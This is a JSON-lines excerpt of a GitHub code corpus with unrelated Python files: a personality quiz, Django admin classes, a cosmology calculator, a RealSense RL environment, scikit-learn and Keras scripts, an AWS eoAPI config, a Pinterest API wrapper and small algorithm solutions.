question_list:\n\t\t\tprint('')\n\t\t\tprint(question.get_question())\n\t\t\tprint(question.get_left() + ' ' + (''.join(str(x) + ' ' for x in range(1, scale+1))) + question.get_right())\n\t\t\tans = 0\n\t\t\twhile ans == 0:\n\t\t\t\tchoice = input('Choice: ')\n\t\t\t\ttry:\n\t\t\t\t\tchoice = int(choice)\n\t\t\t\t\tans = 1\n\t\t\t\texcept:\n\t\t\t\t\tif choice == 'q':\n\t\t\t\t\t\tprint('Have a nice day.')\n\t\t\t\t\t\treturn False\n\t\t\t\t\tprint('Please input a valid response')\n\t\t\t\t\tprint('')\n\n\t\t\tprint('')\n\t\t\tquestion.set_value((choice-1)*(100/(scale-1)))\n\t\t\tanswers.append(choice)\n\n\n\t# Calculate the percentages for each of the 8 types\n\t# If the value was greater than 50% use the right trait\n\t# If it was less, subtract from 100 then use left trait\n\t# If it was equal to 50%, add 50% to both traits\n\tfor question in question_list:\n\t\tvalue = 0\n\t\tif question.value > 50:\n\t\t\ttrait = question.right_trait\n\t\t\tvalue = question.value\n\t\t\tresults[trait] += value\n\t\t\tresults[question.left_trait] += (100-value)\n\t\telif question.value < 50:\n\t\t\ttrait = question.left_trait\n\t\t\tvalue = 100 - question.value\n\t\t\tresults[trait] += value\n\t\t\tresults[question.right_trait] += (100-value)\n\t\telse:\n\t\t\ttrait = str(question.left_trait + \" and \" + question.right_trait)\n\t\t\tvalue = 
50\n\t\t\tresults[question.left_trait] += value\n\t\t\tresults[question.right_trait] += value\n\n\t# These are the raw score results for each of the categories\n\t# print(results)\n\n\t# Calculate the percentage scores for each of the 8 categories\n\tfor key in results:\n\t\tresults[key] = results[key]/(len(question_list)/4)\n\n\t# Combine the relevant categories into a final set of scores\n\ti = 0\n\twhile i < 8:\n\t\tif results[types[i]] > results[types[i+1]]:\n\t\t\tpersonality_type[types[i]] = str(results[types[i]]) + '%'\n\t\t\tpersonality_code = personality_code + symbols[types[i]]\n\t\telif results[types[i+1]] > results[types[i]]:\n\t\t\tpersonality_type[types[i+1]] = str(results[types[i+1]]) + '%'\n\t\t\tpersonality_code = personality_code + symbols[types[i+1]]\n\t\telse:\n\t\t\tpersonality_type[str(types[i] + ' ' + types[i+1])] = '50%'\n\t\ti += 2\n\n\t# Pretend to be calculating :)\n\tfor x in range(50):\n\t\tprint_progress(x, 50, 'Calculating your results: ')\n\t\ttime.sleep(.1)\n\n\n\t# Print the individual's results\n\tprint('')\n\tprint('Your Meyers-Briggs personality type is: ' + personality_code)\n\tprint('')\n\tprint('Here are your detailed results: ')\n\tfor key in personality_type:\n\t\tprint(key + ': ' + personality_type[key])\n\n\tprint('')\n\tprint('Your choices were: ' + str(answers))\n\n# Print iterations progress\n# Obtained from https://gist.github.com/aubricus/f91fb55dc6ba5557fbab06119420dd6a\ndef print_progress(iteration, total, prefix='', suffix='', decimals=1, bar_length=50):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n bar_length - Optional : character length of bar (Int)\n \"\"\"\n str_format = \"{0:.\" + str(decimals) + \"f}\"\n percents = str_format.format(100 * (iteration / float(total)))\n filled_length = int(round(bar_length * iteration / float(total)))\n bar = '█' * filled_length + '-' * (bar_length - filled_length)\n\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percents, suffix), end = '\\r'),\n\n if iteration > total:\n print('\\n')\n\nclass Question():\n\n\tdef __init__(self, question, q_type, left_attr, right_attr, value, left_trait, right_trait):\n\t\tself.question = str(question)\n\t\tself.q_type = q_type\n\t\tself.left_attr = str(left_attr)\n\t\tself.right_attr = str(right_attr)\n\t\tself.value = str(value)\n\t\tself.left_trait = left_trait\n\t\tself.right_trait = right_trait\n\n\tdef get_question(self):\n\t\treturn str(self.question)\n\n\tdef get_type(self):\n\t\treturn str(self.q_type)\n\n\tdef get_left(self):\n\t\treturn self.left_attr\n\n\tdef get_right(self):\n\t\treturn self.right_attr\n\n\tdef set_value(self, value):\n\t\tself.value = value\n\n\tdef get_value(self):\n\t\treturn str(self.value) + \"%\"\n\n\tdef print(self):\n\t\t# TODO\n\t\tpass\n\n\nmrl1_5 = [2, 2, 4, 5, 3, 4, 5, 5, 2, 1, 2, 4, 5, 3, 4, 5, 2, 4, 2, 4, 5, 2, 3, 5]\nmrl = [2, 3, 6, 7, 3, 6, 6, 7, 2, 2, 2, 6, 7, 3, 4, 6, 3, 3, 2, 6, 7, 2, 5, 6]\ncozza = [4, 6, 7, 6, 2, 5, 7, 6, 5, 7, 3, 7, 6, 3, 6, 6, 7, 2, 1, 7, 6, 3, 4, 4]\nmal = [6, 7, 1, 3, 7, 2, 7, 6, 2, 3, 5, 6, 7, 5, 2, 6, 2, 2, 6, 2, 5, 7, 7, 4]\nd = [4, 7, 5, 5, 2, 5, 2, 6, 2, 6, 2, 7, 5, 6, 5, 6, 1, 3, 4, 6, 3, 2, 7, 
6]\n\npersonality(mrl)\n","repo_name":"jlehenbauer/python-projects-public","sub_path":"personality.py","file_name":"personality.py","file_ext":"py","file_size_in_byte":9145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18239347263","text":"from django.db.models import Q\nfrom django.contrib import admin\nfrom django.contrib.admin import SimpleListFilter\nfrom django.utils import timezone\n\nfrom api import models as models_api\n\nfrom ..models import BaseAdminModel, BaseInlineAdminModel, DEFAULT_READONLY\n\n\nclass OrderReservationValidFilter(SimpleListFilter):\n title = 'Time valid'\n parameter_name = 'time_valid'\n\n def lookups(self, request, model_admin):\n return [\n (1, 'Yes'),\n (2, 'No'),\n ]\n\n def queryset(self, request, queryset):\n if self.value() == '1':\n return queryset.filter(\n reservation__ends_at__gt=timezone.now(),\n )\n if self.value() == '2':\n return queryset.filter(\n Q(reservation__ends_at__lte=timezone.now()) |\n Q(reservation__ends_at__isnull=True)\n )\n\n\nclass MealReservationInlineAdmin(BaseInlineAdminModel):\n \"\"\"Admin model for MealReservation.\"\"\"\n\n model = models_api.MealReservation\n\n\nclass ReservationAdmin(BaseAdminModel):\n \"\"\"Admin model for Reservations.\"\"\"\n readonly_fields = ('participant_link', 'checkin_link')\n list_display = (\n 'id',\n 'participant_link',\n 'order_link',\n 'workshop',\n 'accomodation',\n 'price',\n 'ends_at',\n 'is_valid',\n )\n list_filter = (\n 'order__year',\n 'order__confirmed',\n 'order__canceled',\n 'order__paid',\n 'meals',\n )\n inlines = [MealReservationInlineAdmin]\n autocomplete_fields = ('workshop_price', 'order',)\n search_fields = [\n 'order__participant__name',\n 'order__year__year',\n 'accomodation__name',\n 'workshop_price__workshop__name',\n 'order__price'\n ]\n\n\nclass ReservationInlineAdmin(admin.StackedInline):\n \"\"\"Inline admin model for Reservations.\"\"\"\n model = models_api.Reservation\n\n\nclass OrderAdmin(BaseAdminModel):\n \"\"\"Admin model for Orders.\"\"\"\n\n list_display = (\n 'symvar',\n 'participant_link',\n 'reservation_link',\n 'price',\n 'total_amount_received',\n 'is_valid',\n 'canceled',\n 'paid',\n 'created_at',\n 'valid_until',\n )\n list_filter = (\n 'year',\n 'paid',\n 'confirmed',\n 'over_paid',\n 'canceled',\n OrderReservationValidFilter,\n )\n list_select_related = True\n autocomplete_fields = ['participant']\n fields = [\n 'year',\n 'participant',\n 'symvar',\n 'checkin_link',\n 'accomodation_info',\n 'confirmed',\n 'canceled',\n 'paid',\n 'over_paid',\n 'price',\n 'created_at',\n 'updated_at',\n ]\n search_fields = [\n 'participant__name',\n 'participant__team__name',\n 'price',\n 'reservation__accomodation__name',\n 'reservation__workshop_price__workshop__name',\n 'symvar',\n ]\n inlines = [ReservationInlineAdmin]\n\n def get_readonly_fields(self, request, obj=None):\n if obj:\n return [\n 'participant',\n 'symvar',\n 'total_amount_received',\n 'checkin_link',\n ] + DEFAULT_READONLY\n return [\n 'symvar',\n 'total_amount_received',\n 'checkin_link',\n ] + DEFAULT_READONLY\n\n\nclass PaymentAdmin(BaseAdminModel):\n \"\"\"Admin model for Food and its photos.\"\"\"\n list_display = (\n 'ident',\n 'order',\n 'user_identification',\n 'symvar',\n 'symcon',\n 'symspc',\n 'amount',\n 'sender',\n 'bank',\n 'message',\n 'currency',\n 'received_at',\n )\n list_filter = ('bank',)\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"Define all read only fields.\"\"\"\n if obj:\n return 
DEFAULT_READONLY + [\n 'ident',\n 'symvar',\n 'symcon',\n 'symspc',\n 'amount',\n 'sender',\n 'bank',\n 'message',\n 'currency',\n 'received_at',\n ]\n return super(PaymentAdmin, self).get_readonly_fields(\n request,\n obj,\n )\n\n\nclass MealReservationAdmin(BaseAdminModel):\n \"\"\"Admin model for Meal Reservations.\"\"\"\n readonly_fields = (\n 'participant_link',\n 'checkin_link',\n 'reservation',\n 'meal',\n )\n list_display = (\n 'id',\n 'participant_link',\n 'order_link',\n 'reservation_link',\n 'meal',\n 'food',\n 'soup',\n )\n list_filter = (\n 'reservation__order__year',\n 'reservation__order__confirmed',\n 'reservation__order__canceled',\n 'reservation__order__paid',\n )\n autocomplete_fields = ('reservation', 'meal', 'food', 'soup')\n search_fields = [\n 'meal__name',\n 'food__name',\n 'soup__name',\n 'reservation__order__participant__name',\n ]\n","repo_name":"just-paja/festival-api","sub_path":"api_admin/admin/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5642733683","text":"#!/usr/bin/env python \n\nimport numpy as np\nfrom ..astro import angsep\nfrom ..utils import isiterable, vectorize_if_needed\nfrom scipy.integrate import quad\nWMAP9 = [0.693, 0.287, 1.0-0.287]\n\nclass Cosmology:\n \"\"\"\n Class for calculating common cosmological quantities\n \"\"\"\n def __init__(self, params=WMAP9):\n self.h, self.omegaM0, self.omegaL0 = params\n self.H0 = 100.0*self.h # km/s/Mpc\n self.c = 2.99792458e5 # km/s\n self.G = 4.302113488372941e-09 # km2 Mpc / (M_sun s2)\n self.DH = self.c/self.H0\n\n def E(self, z):\n \"\"\"\n the ratio of the Hubble parameter at redshift z to\n its present value\n \"\"\"\n if isiterable(z):\n z = np.asarray(z)\n return np.sqrt(self.omegaM0*(1.0+z)**3 + self.omegaL0)\n\n def rhocrit(self, z):\n \"\"\"\n critical density in units of Msun Mpc^-3\n \"\"\"\n if isiterable(z):\n z = np.asarray(z)\n return (3.0*(self.H0*self.E(z))**2)/(8*np.pi*self.G) \n\n def com_dist(self, z):\n \"\"\"\n comoving distance as a function of z\n \"\"\"\n func = lambda z: quad(lambda z : 1.0/self.E(z), 0, z)[0]\n return self.DH*vectorize_if_needed(func, z)\n\n def D_L(self, z):\n \"\"\"\n angular diameter distance as a function of z\n \"\"\"\n if isiterable(z):\n z = np.asarray(z)\n return self.com_dist(z)*(1.0 + z)\n\n def D_A(self, z):\n \"\"\"\n angular diameter distance as a function of z\n \"\"\"\n if isiterable(z):\n z = np.asarray(z)\n return self.com_dist(z) / (1.0 + z)\n\n def com_sep(self, coord3d_1, coord3d_2):\n \"\"\"\n comoving separation between two galaxies \n \"\"\"\n for i in range(3):\n if isiterable(coord3d_1[i]):\n coord3d_1[i] = np.asarray(coord3d_1[i])\n if isiterable(coord3d_2[i]):\n coord3d_2[i] = np.asarray(coord3d_2[i])\n ra1, dec1, z1 = coord3d_1\n ra2, dec2, z2 = coord3d_2\n Dc1 = self.com_dist(z1)\n Dc2 = self.com_dist(z2)\n theta = angsep(ra1, dec1, ra2, dec2, sepunits='radian')\n sep = np.sqrt(Dc1**2 + Dc2**2 - 2.0*Dc1*Dc2*np.cos(theta))\n return sep \n","repo_name":"johnnygreco/toolbox","sub_path":"toolbox/cosmo/cosmo.py","file_name":"cosmo.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27544353225","text":"import cv2\nimport logging\nimport numpy as np\nimport gym\nimport time\nfrom gym import spaces\nfrom multiprocessing import Array, Value\n\nfrom senseact.devices.real_sense.real_sense_communicator 
import RealSenseCommunicator\nfrom senseact.devices.ur import ur_utils\nfrom senseact.devices.ur.ur_setups import setups\nfrom senseact.rtrl_base_env import RTRLBaseEnv\nfrom senseact.sharedbuffer import SharedBuffer\nfrom senseact import utils\n\n\nclass RealSenseEnv(RTRLBaseEnv, gym.core.Env):\n def __init__(self,\n camera_res=(3, 480, 640),\n time_limit=10,\n hosts=('localhost',),\n ports=(5000,),\n rng=np.random,\n **kwargs):\n assert time_limit > 0\n assert len(hosts) == len(ports)\n\n self.num_cameras = len(hosts)\n self.buffer_len = 2\n self.action_dim = 2\n self.camera_dim = int(np.product(camera_res))\n self.input_dim = self.num_cameras * self.camera_dim\n self.camera_res = camera_res\n\n self._time_limit = time_limit\n\n self.rng = rng\n\n self._action_space = spaces.Discrete(2)\n self._observation_space = spaces.Box(\n low=0, high=1, shape=(self.input_dim,), dtype=np.float32)\n\n # Setup communicator and buffer\n communicator_setups = {}\n self._camera_images_ = {}\n\n for idx, (host, port) in enumerate(zip(hosts, ports)):\n communicator_setups[f'Camera_{idx}'] = {\n 'Communicator': RealSenseCommunicator,\n # have to read in this number of packets everytime to support\n # all operations\n 'num_sensor_packets': self.buffer_len,\n 'kwargs': {\n 'host': host,\n 'port': port,\n 'num_channels': camera_res[0],\n 'height': camera_res[1],\n 'width': camera_res[2]\n }\n }\n\n self._camera_images_[f'Camera_{idx}'] = np.frombuffer(\n Array('f', self.camera_dim).get_obj(), dtype='float32')\n\n super(RealSenseEnv, self).__init__(\n communicator_setups=communicator_setups,\n action_dim=self.action_dim,\n observation_dim=self.input_dim,\n **kwargs\n )\n\n self._obs_ = np.zeros(shape=self.input_dim)\n self.episode_steps = Value('i', 0)\n\n def _reset_(self):\n self.done = False\n self.episode_steps.value = 0\n self._sensor_to_sensation_()\n\n def _compute_sensation_(self, name, sensor_window, timestamp_window, index_window):\n if name.startswith('Camera'):\n image = np.array(sensor_window[-1])\n camera_idx = int(name.split(\"_\")[1])\n np.copyto(self._camera_images_[name], image.flatten())\n np.copyto(self._obs_[camera_idx * self.camera_dim:(camera_idx + 1) * self.camera_dim], image.flatten())\n \n reward = self._compute_reward()\n \n return np.concatenate((self._obs_, [reward], [self.done]))\n\n def _compute_actuation_(self, action, timestamp, index):\n if action[1]:\n self.done = True\n\n def _check_done(self, env_done):\n self.episode_steps.value += 1\n return env_done or (self._time_limit < self.episode_steps.value)\n\n def _compute_reward(self):\n return self.rng.normal(loc=0, scale=self.episode_steps.value)\n\n @property\n def observation_space(self):\n return self._observation_space\n\n @property\n def action_space(self):\n return self._action_space\n\n def render(self):\n cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\n images = []\n for idx in range(self.num_cameras):\n images.append(self._camera_images_[f'Camera_{idx}'].reshape(self.camera_res).transpose(1, 2, 0))\n images = np.hstack(images)\n cv2.imshow('RealSense', images)\n cv2.waitKey(1)\n\n def terminate(self):\n \"\"\"Gracefully terminates environment processes.\"\"\"\n super(RealSenseEnv, self).close()\n\n\nif __name__ == \"__main__\":\n hosts = ('localhost',)\n ports = (5000,)\n env = RealSenseEnv(\n time_limit=10,\n hosts=hosts,\n ports=ports)\n env.start()\n \n for episode in range(10):\n print(f\"Episode: {episode}\")\n done = False\n obs = env.reset()\n while not done:\n env.render()\n obs, reward, done, _ = 
env.step([1, 0])\n\n env.close()\n","repo_name":"utiasSTARS/robust-latent-srl","sub_path":"env/senseact/senseact/envs/real_sense/real_sense_env.py","file_name":"real_sense_env.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"6493212052","text":"from tensorflow import keras\n\n\ndef main():\n model = keras.models.load_model('models/py/model.h5', compile=False)\n print(\"Model has been loaded !\")\n\n model.compile()\n print(model.inputs[0].dtype)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MirrorMaru/UQAC_SL_translator","sub_path":"sign_language_detection/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4647893570","text":"import socket\r\nreader=open(\"host.txt\",\"r\")\r\nout=open(\"ip.txt\",\"w\")\r\nfor host in reader.read().split('\\n'):\r\n\ttry:\r\n\t\tip=socket.gethostbyname(host)\r\n\texcept:\r\n\t\tip=\"N/A\"\r\n\tout.write(ip)\r\n\tout.write(\"\\n\")\r\nout.close()\r\nreader.close()","repo_name":"gm09519/host2ip","sub_path":"host2ip.py","file_name":"host2ip.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20778083182","text":"import json\nimport numpy as np\nimport numpy.random as nr\nimport scipy\nfrom sklearn import svm\nfrom sklearn import mixture\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import log_loss\n\n\"\"\"\nLoad training set\n\"\"\"\ndata_train_path = './deeplearning/feature/acoustic/data_train_ALL_300_concat.txt'\ndata_train = []\nwith open(data_train_path, 'r') as from_training_data_file:\n data_train = json.load(from_training_data_file)\n\n# Pre-process Train Dataset\ntrain_videos = []\nX_train = []\ny_train = []\nfor sample in data_train:\n train_videos.append(sample[0])\n y_train.append(sample[1])\n X_train.append(sample[2])\n\n\"\"\"\nLoad validation set\n\"\"\"\ndata_test_path = './deeplearning/feature/acoustic/data_test_ALL_300_concat.txt'\ndata_test = []\nwith open(data_test_path, 'r') as from_test_data_file:\n data_test = json.load(from_test_data_file)\n\n# Pre-process Test Dataset\ntest_videos = []\nX_test = []\ny_test = []\nfor sample in data_test:\n test_videos.append(sample[0])\n y_test.append(sample[1])\n X_test.append(sample[2])\n\ncheck_output_file = open('output_stuff.txt', 'w')\ncheck_output_file.write(str(y_test))\ncheck_output_file.write(str(X_test))\ncheck_output_file.close()\n\n\"\"\"\nTrain our model using...\nGMM\nand Evaluate on validation set\n\nREMEMBER TO CHANGE THE OUTPUT FILE NAME. 
n100 (the portion at the\nback of the name is n_estimators)\n\"\"\"\n# multi_class_classifier = mixture.GMM(n_components=25).fit(X_train, y_train)\nmulti_class_classifier = RandomForestClassifier(n_estimators=500).fit(X_train, y_train)\n\n# Evaluate on Train set\nprint(\"\\nTraining Data (in-sample) scores and classification_report: \")\nprint(str(multi_class_classifier.score(X_train, y_train)))\nmulti_class_classifier_probs = multi_class_classifier.predict_proba(X_test)\nsig_score = log_loss(y_test, multi_class_classifier_probs)\nprint(\"\\nsig_score: \" + str(sig_score) + \"\\n\")\nprint(classification_report(y_train, multi_class_classifier.predict(X_train), target_names=None))\n\n# Our prediction\ntest_prediction = multi_class_classifier.predict(X_test)\nprint(test_prediction, len(test_prediction))\n\n# Export and save the model for future use so you don't need to train again\n# joblib.dump(multi_class_classifier, 'model.pkl', compress=9)\n\n# Evaluate on Test set - Results written to disk\n# Output classification_report and accuracy in-sample and out-of-sample\ncheck_output_file = open(data_test_path + '-scores-forests-n500.txt', 'w')\ncheck_output_file.write(str(multi_class_classifier.score(X_test, y_test)))\ncheck_output_file.write(classification_report(y_test, test_prediction, target_names=None))\ncheck_output_file.close()\n\"\"\"\ncheck_output_file = open('output_predict_probab.txt', 'w')\ncheck_output_file.write(\"\\n\")\ncheck_output_file.write(str(list(multi_class_classifier.predict_proba(X_test))))\ncheck_output_file.write(\"\\n Predict Proba len\")\ncheck_output_file.write(str(len(multi_class_classifier.predict_proba(X_test))))\ncheck_output_file.write(\"\\n Predict Proba len 1st\")\ncheck_output_file.write(str(len(multi_class_classifier.predict_proba(X_test)[0])))\ncheck_output_file.close()\n\"\"\"\n","repo_name":"NatashaKSS/CS2108","sub_path":"Ass2/classify_video_venue_final_GMM_forests.py","file_name":"classify_video_venue_final_GMM_forests.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74203821287","text":"from typing import Any, Dict, List, Union\n\nimport pydantic\nimport yaml\nfrom aws_cdk import aws_ec2\nfrom pydantic_core.core_schema import FieldValidationInfo\nfrom pydantic_settings import BaseSettings\n\n\nclass AppConfig(BaseSettings):\n project_id: str = pydantic.Field(\n description=\"Project ID\", default=\"eoapi-template-demo\"\n )\n stage: str = pydantic.Field(description=\"Stage of deployment\", default=\"test\")\n # because of its validator, `tags` should always come after `project_id` and `stage`\n tags: Dict[str, str] | None = pydantic.Field(\n description=\"\"\"Tags to apply to resources. If none provided, \n will default to the defaults defined in `default_tags`.\n Note that if tags are passed to the CDK CLI via `--tags`, \n they will override any tags defined here.\"\"\",\n default=None,\n )\n auth_provider_jwks_url: str | None = pydantic.Field(\n description=\"\"\"Auth Provider JSON Web Key Set URL for\n ingestion authentication. If not provided, \n no authentication will be required.\"\"\",\n default=None,\n )\n data_access_role_arn: str | None = pydantic.Field(\n description=\"\"\"Role ARN for data access, that will be\n used by the STAC ingestor for validation of assets\n located in S3 and for the tiler application to access\n assets located in S3. If none, the role will be\n created at runtime with full S3 read access. 
If\n provided, the existing role must be configured to\n allow the tiler and STAC ingestor lambda roles to\n assume it. See https://github.com/developmentseed/eoapi-cdk\"\"\",\n default=None,\n )\n db_instance_type: str = pydantic.Field(\n description=\"Database instance type\", default=\"t3.micro\"\n )\n db_allocated_storage: int = pydantic.Field(\n description=\"Allocated storage for the database\", default=5\n )\n public_db_subnet: bool = pydantic.Field(\n description=\"Whether to put the database in a public subnet\", default=True\n )\n nat_gateway_count: int = pydantic.Field(\n description=\"Number of NAT gateways to create\",\n default=0,\n )\n bastion_host: bool = pydantic.Field(\n description=\"\"\"Whether to create a bastion host. It can typically \n be used to make administrative connections to the database if \n `public_db_subnet` is False\"\"\",\n default=False,\n )\n bastion_host_create_elastic_ip: bool = pydantic.Field(\n description=\"\"\"Whether to create an elastic IP for the bastion host.\n Ignored if `bastion_host` equals `False`\"\"\",\n default=False,\n )\n bastion_host_allow_ip_list: List[str] = pydantic.Field(\n description=\"\"\"YAML file containing list of IP addresses to \n allow SSH access to the bastion host. Ignored if `bastion_host`\n equals `False`.\"\"\",\n default=[],\n )\n bastion_host_user_data: Union[Dict[str, Any], aws_ec2.UserData] = pydantic.Field(\n description=\"\"\"Path to file containing user data for the bastion host.\n Ignored if `bastion_host` equals `False`.\"\"\",\n default=aws_ec2.UserData.for_linux(),\n )\n titiler_buckets: List[str] = pydantic.Field(\n description=\"\"\"Path to YAML file containing list of\n buckets to grant access to the titiler API\"\"\",\n default=[],\n )\n acm_certificate_arn: str | None = pydantic.Field(\n description=\"\"\"ARN of ACM certificate to use for \n custom domain names. If provided,\n CDNs are created for all the APIs\"\"\",\n default=None,\n )\n stac_api_custom_domain: str | None = pydantic.Field(\n description=\"\"\"Custom domain name for the STAC API. \n Must provide `acm_certificate_arn`\"\"\",\n default=None,\n )\n titiler_pgstac_api_custom_domain: str | None = pydantic.Field(\n description=\"\"\"Custom domain name for the titiler pgstac API. \n Must provide `acm_certificate_arn`\"\"\",\n default=None,\n )\n stac_ingestor_api_custom_domain: str | None = pydantic.Field(\n description=\"\"\"Custom domain name for the STAC ingestor API.\n Must provide `acm_certificate_arn`\"\"\",\n default=None,\n )\n tipg_api_custom_domain: str | None = pydantic.Field(\n description=\"\"\"Custom domain name for the tipg API. 
\n Must provide `acm_certificate_arn`\"\"\",\n default=None,\n )\n stac_browser_version: str | None = pydantic.Field(\n description=\"\"\"Version of the Radiant Earth STAC browser to deploy.\n If none provided, no STAC browser will be deployed.\n If provided, `stac_api_custom_domain` must be provided\n as it will be used as a backend.\"\"\",\n default=None,\n )\n\n @pydantic.field_validator(\"tags\")\n def default_tags(cls, v, info: FieldValidationInfo):\n return v or {\"project_id\": info.data[\"project_id\"], \"stage\": info.data[\"stage\"]}\n\n @pydantic.model_validator(mode=\"after\")\n def validate_nat_gateway_count(self) -> \"AppConfig\":\n if not self.public_db_subnet and (\n self.nat_gateway_count is not None and self.nat_gateway_count <= 0\n ):\n raise ValueError(\n \"\"\"if the database and its associated services instances\n are to be located in the private subnet of the VPC, NAT\n gateways are needed to allow egress from the services\n and therefore `nat_gateway_count` has to be > 0.\"\"\"\n )\n else:\n return self\n\n @pydantic.model_validator(mode=\"after\")\n def validate_stac_browser_version(self) -> \"AppConfig\":\n if (\n self.stac_browser_version is not None\n and self.stac_api_custom_domain is None\n ):\n raise ValueError(\n \"\"\"If a STAC browser version is provided, \n a custom domain must be provided for the STAC API\"\"\"\n )\n else:\n return self\n\n @pydantic.model_validator(mode=\"after\")\n def validate_acm_certificate_arn(self) -> \"AppConfig\":\n if self.acm_certificate_arn is None and any(\n [\n self.stac_api_custom_domain,\n self.titiler_pgstac_api_custom_domain,\n self.stac_ingestor_api_custom_domain,\n self.tipg_api_custom_domain,\n ]\n ):\n raise ValueError(\n \"\"\"If any custom domain is provided, \n an ACM certificate ARN must be provided\"\"\"\n )\n else:\n return self\n\n def build_service_name(self, service_id: str) -> str:\n return f\"{self.project_id}-{self.stage}-{service_id}\"\n\n\ndef build_app_config() -> AppConfig:\n \"\"\"Builds the AppConfig object from config.yaml file if exists,\n otherwise use defaults\"\"\"\n try:\n with open(\"config.yaml\") as f:\n print(\"Loading config from config.yaml\")\n app_config = yaml.safe_load(f)\n app_config = (\n {} if app_config is None else app_config\n ) # if config is empty, set it to an empty dict\n app_config = AppConfig(**app_config)\n except FileNotFoundError:\n # if no config at the expected path, using defaults\n app_config = AppConfig()\n\n return app_config\n","repo_name":"developmentseed/eoapi-template","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21451387495","text":"from typing import Dict, List\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n num_idx_map: Dict[int, int] = {}\n for idx, num in enumerate(nums):\n if target - num in num_idx_map.keys():\n return [num_idx_map[target-num], idx]\n else:\n num_idx_map[num] = idx\n return [0, 0]","repo_name":"jerrt2003/leetcode-in-python","sub_path":"1_Two_Sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14062799526","text":"# Author Hassan Alvi\n# Creation date : 20th July 2018\n\nfrom pin_py.utils.http import Requests\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\n\n\nclass PinPy:\n 
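    # Thin helper around the Pinterest v1 REST API: each method below builds a
    # URL embedding the caller's access_token, issues it through self.request,
    # and returns the decoded JSON payload (or an error string / None on failure).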
pinterest_url = \"https://api.pinterest.com/\"\n\n def __init__(self):\n self.request = Requests()\n self.all_pins = []\n pass\n\n def authorize(self, user_auth_token):\n\n query = \"v1/me?access_token={}\".format(user_auth_token)\n request = self.request.get(PinPy.pinterest_url + query)\n if request.status_code != 200:\n return None\n json_object = json.loads(request.text)\n # authorize user and if he authorizes, it returns a User Object\n # if he fails to authorize return null\n return json_object\n\n # it returns a dict of data about pin\n # in data attribute there is creator of pin, media type of pin\n # created_time of pin, board of pin, and analytics of its likes and comments\n\n def get_single_pin_details(self, pin_id, access_token):\n if pin_id is None or pin_id == '' or access_token is None or access_token == '':\n return ' pin_id or access_token is wrong'\n\n pinterest_url = 'https://api.pinterest.com/v1/pins/{0}/?access_token={1}&fields=counts,board,creator,' \\\n 'created_at,media,note'.format(pin_id, access_token)\n request = self.request.get(pinterest_url)\n if request.status_code != 200:\n json_object = json.loads(request.text)\n error = 'Status code is not 200 it is ' + str(request.status_code) + ' ' + json_object['message']\n return error, None\n\n json_object = json.loads(request.text)\n\n if 'data' not in json_object:\n return json_object['message'], None\n\n return json_object\n\n # Return the array of Pins, these are just ids of PINS and if you require specific detail of sme pin you need to\n # call get_details_of_all_pins and pass that pin ID\n def get_details_of_all_pins(self, user_auth_token):\n\n query = \"v1/me/pins?access_token={}\".format(user_auth_token)\n url = PinPy.pinterest_url + query\n\n while url is not None:\n request = self.request.get(url)\n if request.status_code != 200:\n return None\n\n json_object = json.loads(request.text)\n if \"data\" in json_object:\n for pin in json_object[\"data\"]:\n self.all_pins.append(pin[\"id\"])\n\n if \"page\" in json_object:\n url = json_object[\"page\"][\"next\"]\n #url = None # JUST FOR DEBUGGINJ\n else:\n url = None\n\n return self.all_pins\n\n # return a dict in which array of boards is embedded.\n # Typical board has following attributes URL, ID, NAME\n def get_all_boards_of_user(self, user_auth_token):\n query = \"v1/me/boards?access_token={}\".format(user_auth_token)\n request = self.request.get(PinPy.pinterest_url + query)\n if request.status_code != 200:\n return None\n json_object = json.loads(request.text)\n return json_object\n","repo_name":"d4interactive-archive/pinterest-api","sub_path":"pin_py/pinterest/pinpy.py","file_name":"pinpy.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27751315","text":"# 75%(こっちの方が簡潔でわかりやすい)\ndef solution(A):\n from collections import Counter\n falf = len(A) // 2\n # 奇数であればdominatorは「商+1」になる\n dominator_num = falf if len(A) % 2 == 0 else falf + 1\n\n counter = Counter(A)\n most_appear_num = max(counter, key=counter.get)\n # 出現回数が全体の要素数の半分未満の場合、−1を返す\n if dominator_num > counter[most_appear_num]:\n return -1\n\n # 